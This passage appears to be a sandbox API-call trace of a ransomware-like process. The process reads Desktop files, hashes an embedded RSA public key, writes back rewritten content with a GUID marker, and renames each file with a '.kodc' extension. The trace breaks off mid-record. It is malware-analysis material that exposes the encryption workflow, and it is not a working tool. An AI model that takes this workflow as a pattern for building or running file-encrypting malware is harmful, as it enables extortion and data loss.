[0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a700 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6e8 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6b8 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6a0 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333ffd8 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0097.763] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x15f41, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x15f41, lpOverlapped=0x0) returned 1 [0097.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0097.763] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15f46, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.763] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0097.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0097.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce208 | out: hHeap=0x630000) returned 1 [0097.764] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0097.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.764] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.764] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.764] CloseHandle (hObject=0x5cc) returned 1 [0097.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0097.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce208 | out: hHeap=0x630000) returned 1 [0097.765] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\he-u.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\he-u.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\he-u.swf.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\he-u.swf.kodc")) returned 1 [0097.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.766] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0097.767] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bac6050, ftCreationTime.dwHighDateTime=0x1d5b981, ftLastAccessTime.dwLowDateTime=0xc9c32bf0, ftLastAccessTime.dwHighDateTime=0x1d5c249, ftLastWriteTime.dwLowDateTime=0xc9c32bf0, ftLastWriteTime.dwHighDateTime=0x1d5c249, nFileSizeHigh=0x0, nFileSizeLow=0x40c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J6bjq9K.xls", cAlternateFileName="")) returned 1 [0097.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0097.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.767] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J6bjq9K.xls") returned=".xls" [0097.767] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J6bjq9K.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j6bjq9k.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.767] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=16584) returned 1 [0097.767] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.770] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x40a2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.770] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.771] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.771] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x40c8, lpOverlapped=0x0) returned 1 [0097.771] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.771] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.771] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.771] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0097.772] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.773] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.773] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.773] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.773] GetLastError () returned 0x0 [0097.773] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.773] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0097.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.773] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.773] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.773] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40d0) returned 0x9ba4d90 [0097.774] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333ffd8 [0097.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6a0 [0097.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x3340020 [0097.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6b8 [0097.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6e8 [0097.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a700 [0097.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.774] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0097.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6e8 | out: hHeap=0x630000) returned 1 [0097.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a700 | out: hHeap=0x630000) returned 1 [0097.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0097.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a700 [0097.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0097.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a6e8 [0097.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0097.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0097.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0097.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0097.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a700 | out: hHeap=0x630000) returned 1 [0097.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6e8 | out: hHeap=0x630000) returned 1 [0097.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.775] GetCurrentThreadId () returned 0x42c [0097.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x696188 [0097.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0097.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.776] GetCurrentThreadId () returned 0x42c [0097.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6e8 [0097.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0097.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a700 [0097.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6d0 [0097.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.778] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x40c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.778] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.778] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.778] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.778] CloseHandle (hObject=0x5cc) returned 1 [0097.779] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J6bjq9K.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j6bjq9k.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J6bjq9K.xls.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j6bjq9k.xls.kodc")) returned 1 [0097.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.780] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0097.782] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18c40080, ftCreationTime.dwHighDateTime=0x1d5b8fe, ftLastAccessTime.dwLowDateTime=0x451aeb30, ftLastAccessTime.dwHighDateTime=0x1d5bb1f, ftLastWriteTime.dwLowDateTime=0x451aeb30, ftLastWriteTime.dwHighDateTime=0x1d5bb1f, nFileSizeHigh=0x0, nFileSizeLow=0x5b63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkjdLnetgwIJnbnmh.ods", 